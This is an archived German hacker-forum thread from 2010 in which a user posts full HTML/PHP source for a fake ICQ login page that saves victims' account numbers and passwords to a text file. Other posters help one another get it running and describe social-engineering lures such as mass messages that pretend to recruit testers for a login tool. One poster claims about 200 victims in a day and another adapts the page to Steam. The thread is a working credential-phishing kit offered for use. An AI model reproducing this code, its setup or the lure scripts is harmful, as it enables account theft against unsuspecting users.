PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : ICQ Phishing for idiots



Brainfuck ++
23.05.2010, 21:21
Hey Leute,

hab ne phising Site für ICQ Uins erstellt. Klappt soweit auch ganz gut :)
Schreibt username + pw einfach in ne textdatei.

Ich sag den leuten einfach das ich n online ICQ Login programmieren will und die das dann mal testen soll. Natürlich passiert gar nichts außer eine Fehlermeldung :D ...

Also hier mal n Screeshot
icq_site.jpg - ImageHost.org (http://j.imagehost.org/view/0890/icq_site)

Wenn Interesse am Quelltext besteht geb ich den gerne raus zum nachmachen ! :)

Kommentare sind erwünscht. Danke...


QUELLTEXT:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ICQ Login</title>
<style type="text/css">
<!--
body {
background-color: #999999;
}
-->
</style></head>

<body>
<div align="center">
<table width="700" border="1" bordercolor="#000000">
<tr>
<td><img src="icq.jpg" width="750" height="200" alt="icq" /></td>
</tr>
<tr>
<td bgcolor="#FFFFFF"><p>&nbsp;</p>
<blockquote>
<blockquote>
<blockquote>
<p align="center"><em>Bitte melde dich mit deiner ICQ Nummer und deinem Passwort an. </em></p>
<div align="center"></div>
<form action="index.php" method="post">
<table width="350" border="0" align="center">
<tr>
<td>ICQ Nummer </td>
<td><input type="text" name="nr" /></td>
</tr>
<tr>
<td>ICQ Passwort </td>
<td><input type="password" name="pw" /></td>
</tr>
<tr>
<td><input type="submit" value="Anmelden" name="Anmelden" /></td>
<td>&nbsp;</td>
</tr>
</table>
</form>

<?php
if(isset($_POST['Anmelden']))
{
$datei = fopen("icqtest.txt","a+");
fwrite($datei, $_POST['nr']);
fwrite($datei, $_POST['pw']);

echo '<p align="center"><b>Leider war der ICQ Login nicht erfolgreich.</b></p>';
}
?>
<blockquote>
<p align="center">&nbsp;</p>
</blockquote>
</blockquote>
</blockquote>
<p>&nbsp;</p>
</blockquote> </td>
</tr>
</table>
</div>
</body>
</html>

Ascor
23.05.2010, 21:22
Hmm...
Das Design gefällt mir.
Edles Weiß!
Top!
Screenshot währe ganz nett ;)

Die Idee klingt gut.
Quellcode währe ganz nett
Welche Sprache?

Ratchet
23.05.2010, 21:23
Da ist doch kein Mensch so blöd und gibt seine Daten ein.

Brainfuck ++
23.05.2010, 21:24
Screenshot hab ich grad reineditiert !
Sprache: PHP

Und du glaubst gar nicht wie doof die leute sind :D wie verdammt doof...überschätz die mal nicht xD die richtige story ist alles ! versprochen ..

D4NiK
23.05.2010, 21:25
So schön wie es auch ist aber du willst doch nicht wirklich sagen das du damit viele uins bekommst?

Guckste_Oo
23.05.2010, 21:28
Was erzählst du den Leuten denn ?
Ich würde meine Icqnummer mit Passwort auf KEINER aber wirklich auf KEINER Seite eingeben. Nichtmal auf Icq.de. Geht das dort überhaupt cO ?

D4NiK
23.05.2010, 21:29
Eben das ist es ja xD und wenn geb ich immer bei solchen seiten an
Nummer : Leck
Passwort : Mich
find ich immer ganz lustig also denke nicht das das so gut klappt!

Brainfuck ++
23.05.2010, 21:29
ja nicht von jedem aber das ist klar...du findest auch nicht für jeden trojaner usw einen der das aufmacht...

wie gesgat die topic heisst ja auch " ... for idiots "

D4NiK
23.05.2010, 21:33
Naja i-wie doch hatte nach ca nem tag 200 Vics

Iaa_1
23.05.2010, 21:43
Dann solltest du genau so einfach an ICQ-Nummern dadurch kommen. Es geht wirklich einfach, schnell und viele glauben es.

Guckste_Oo
23.05.2010, 21:53
Muss man das W3 dafür haben ? Im Quellcode steht "icq.jpg" jedoch sehe ich keine Bilddatei mit diesen namen. Auch wenn ich einen Test mit durchjage entsteht keine Logdatei. Einfach eine Seite mit Error halt... Objekt konnte nicht gefunden werden blabla...
Fehlt dort evtl etwas ?

Dewen
23.05.2010, 21:58
Wer seine 6-Stellige ICQ UIN in eine deratige Seite einträgt muss einen IQ haben, welcher es dem eigentlichem Nutzer und Besitzer dieser UIN verbietet diese Seite aufzurufen.

Ergo -> Ich denke eine ICQ-Phishing Page lohnt im Endeffekt nur mit massig Spam-Mails

Brainfuck ++
23.05.2010, 22:00
eigentlich sollte es gehen .... ! erstellt die datei mal "icqtest.txt" und gib schreib rechte !
dann sollte es gehen ...

ja das bild fehlt sorry

Guckste_Oo
23.05.2010, 22:08
Nein das funktioniert auch nicht. Selbst mit schreibrechten und einer selbst erstellten " Icqtest.txt " Ich werde wieder nur auf eine " Fehlendes Objekt ......... " Errorseite weitergeleitet. Vieleicht fügst du uns die


<p align="center"><b>include ./config/icqbuild.php ERROR</b></p>';

" Icqbuild " auch noch hinzu ?

Mfg

D4NiK
23.05.2010, 22:11
Würd ich auch mal sagen xD

Brainfuck ++
23.05.2010, 22:19
:D nein jungs ... die icqbuild ist fiktiv ! :D ... da könnte auch "failed to open brain" stehen ! das ist nur ne fehlermeldung für die useR :D

ihr braucht nur "icqtest.txt" mal anlegen und dann die rechte für "Alle Benutzter" auf lesen und schreiben setzen.

Guckste_Oo
23.05.2010, 22:21
Komisch ist nur, das mir keine richtige Fehlermeldung angezeigt wird. In dem Code wird auf eine Datei in einem Ordner hingewiesen die nicht existiert. Der Fehlercode müsste sich doch somit in der Datei befinden oder nicht ?
Abgesehen davon, wer sagt das ich ein Jungchen bin ? ^^

Brainfuck ++
23.05.2010, 22:22
ich versteh grad nicht was bei euch nicht geht :D ich habs noch mal bei mir aufm webspace getestet und das muss so funktionieren :/

bitte mal genauere fehlerbeschreibung wenns nicht geht !

und entschuldigung an madame ! ^^ falls er / sie eine madame is !? ^^

D4NiK
23.05.2010, 22:23
Eben es kommt ja keine Error Meldung oder sowas man würd drauf angewiesen das eine Datei nicht exestiert.

Brainfuck ++
23.05.2010, 22:24
ja okay das is vllt n bisschen verwirrend ... vllt sollte ich einfach reinschreiben "ICQ Login war nicht erfolgreicht" ... wenns nur darum geht

D4NiK
23.05.2010, 22:26
Ja versuch mal aber denke nicht das es etwas bringt xD

Guckste_Oo
23.05.2010, 22:26
Eben es kommt ja keine Error Meldung oder sowas man würd drauf angewiesen das eine Datei nicht exestiert.

Genau.


Objekt nicht gefunden!

Der angeforderte URL konnte auf dem Server nicht gefunden werden. Der Link auf verweisende Seite der scheint falsch oder nicht mehr aktuell zu sein. Bitte informieren Sie den Webmaster über den Fehler.
Sofern Sie dies für eine Fehlfunktion des Servers halten, informieren Sie bitte den Webmaster hierüber.

Brainfuck ++
23.05.2010, 22:28
Aber ansich funkionierts ja :D ihr könnt layout und/oder Fehlermeldung ja individuell gestalten :)

D4NiK
23.05.2010, 22:29
Ganz genau !!!!!!
Von daher wirds nicht bringen es fehlt ja eine datei und ned die Error Message die nach dem Login Button kommt.

Brainfuck ++
23.05.2010, 22:31
gut :D ich dachte schon das ding funktioniert nicht xD hab schon an mir gezweifelt :/ ^^

Guckste_Oo
23.05.2010, 22:34
Also ich bekomme trotz Schreibrechte auf die Txt kein test / test dareingeschrieben ^^

D4NiK
23.05.2010, 22:34
Nene bloß i-wo hast du nen datei oder ordner der dazu gehört den wir nicht haben von daher ist es halt bissl komisch für uns mit der error message da xD

Brainfuck ++
23.05.2010, 22:35
das kann doch gar nicht sein :D :D

heisst das ding auch index.php ? und liegt die textdatei im selben ordner ? und die rechte wirklich für alle benutzer gegebn ?

D4NiK
23.05.2010, 22:38
Schau mal bitte ob du i-wie ordner oder datein für die website angelegt hast das machts doch viel Leichter

Guckste_Oo
23.05.2010, 22:40
das kann doch gar nicht sein :D :D

heisst das ding auch index.php ? und liegt die textdatei im selben ordner ? und die rechte wirklich für alle benutzer gegebn ?


Nach umbenennung von neuetxt.php ( mit dem Code drinne )
auf index.php hats nun gefunkt :D


Ty für die Hilfestellungen und deine bemühungen.

D4NiK
23.05.2010, 22:45
Bei mir gehts trotzdem nicht =(

Brainfuck ++
23.05.2010, 22:47
gerne ! :)

@ d4nik: bei dir kann ich nur das selbe sagen ...

1. rechte setzen
2. name = index.php
3. alles im selben verzeichniss?

D4NiK
23.05.2010, 22:51
Ja geht trotzdem nicht kannst ja morgen mal über Tv bei mir veruschen

Brainfuck ++
23.05.2010, 22:52
ja klar lässt sich machen ;) könnten wir auch jetz machen falls du zeit und lust hast must mir nur bescheid sagen

Guckste_Oo
23.05.2010, 22:59
Naja wie Bf schon sagt, gibts bestimmt irgendwelche idioten. Gibt ja ne ganz tolle Funktion mit der man auch seine Icqleute anschreiben kann. Es nennt sich - Massmessage. Man gaukelt ihnen einfach vor, das man grade ein Script für Icq schreibt das es einen erlaubt irgendeinen Vorteil gegenüber anderen zu haben sich dazu aber erst einloggen muss und man dafür halt ein paar Testpersonen braucht. Die werden einen dann sagen blabla... Error dies und das und schon gehts weiter ^^

Ist zwar nicht die netteste Methode aber irgendjemand lässt sich bestimmt finden.

Apex
23.05.2010, 23:13
Also wenn du mir den Link senden würdest, abgesehen davon, dass ich das hier eben gelesen habe würde ich mich garnicht erst versuchen dort abzumelden. Wirkt einfach nicht seriös genug ist mal so garnicht im Stil von ICQ

Brainfuck ++
23.05.2010, 23:14
das soll im stil vom eigen projekt laufen !

wie von "guckste" beschrieben ;) ... soziale beeinflussung musste dann spielen lassen xD

Matrixianer
24.05.2010, 00:04
krass! wirklich gute arbeit und echt spaaaaßig :) ... weiter so!

D4NiK
24.05.2010, 10:18
Ehm könntest mal des ICQ Bild uppen das wir das auch haben xD pls

err000r
24.05.2010, 11:13
screenshot, geht schneller ;)

D4NiK
24.05.2010, 11:29
Habe das ganze mal ein bisschen zu Steam angepasst
natürlich werde ich das nicht veröffentlich wahrscheinlich willst du das garnicht aber ich zeig mal wie es ausieht im browser xD
http://i49.tinypic.com/f569tk.png